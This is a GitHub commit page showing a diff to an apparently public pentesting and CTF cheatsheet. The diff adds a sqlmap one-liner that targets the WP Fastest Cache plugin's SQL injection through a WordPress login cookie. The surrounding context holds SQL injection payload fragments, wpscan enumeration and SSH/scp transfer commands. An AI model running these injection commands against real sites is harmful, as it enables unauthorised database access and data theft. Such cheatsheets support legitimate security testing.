-
-
Notifications
You must be signed in to change notification settings - Fork 2
Commit
This commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
- Loading branch information
leetcore
committed
Feb 22, 2024
1 parent
98cc1e6
commit f6f7d9c
Showing
1 changed file
with
8 additions
and
2 deletions.
There are no files selected for viewing
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
|
@@ -3,7 +3,7 @@ | |
/_ | _[ | _[ | / / || _><__ || | _\ | / | |__| ]_ | ||
\||___/|___/ /_/ |/ |/\_/ |/ |/ |/ |___/|___/ | ||
|
||
Version 0.9 | ||
Version 1.0 | ||
Changes are welcome! | ||
GitHub: https://github.com/Leetcore/1337-observer | ||
This file is my cheatsheet for pentesting and CTFs. | ||
|
@@ -13,7 +13,8 @@ If you read with `less` type `-i` (ignore case) before searching. | |
Type `/nc` to search. | ||
|
||
🔥 HOT HOT HOT | ||
In this file: log4shell (java), printnightmare (windows), pwnkit (linux). | ||
In this file: wordpress fastest cache (php), log4shell (java), printnightmare (windows), | ||
pwnkit (linux). | ||
|
||
# IP setup | ||
host=127.0.0.1 | ||
|
@@ -386,13 +387,18 @@ filter?category=Gifts' || 'Pets | |
enumerate plugins, themes etc | ||
wpscan --url http://domain -e vp,dbe,cb | ||
|
||
# wordpress wp fastest cache (wp, plugin) | ||
sqlmap --dbms=mysql -u "http://domain.com/wp-login.php" --cookie='wordpress_logged_in=*' --level=2 --banner --batch | ||
|
||
# SSH (port forwarding) | ||
ssh -L 3389:10.200.115.35:3389 -i id.key [email protected] | ||
|
||
# SCP (scp, ssh, copy, file): | ||
scp /path/of/your/local/filename username@hostname:/path/to/remote/server/folder | ||
|
||
# upload (-l maxspeed) | ||
scp -l 1000000 file.zip [email protected]:/tmp | ||
|
||
# download (-l maxspeed) | ||
scp -l 1000000 [email protected]:/tmp . | ||
|
||
|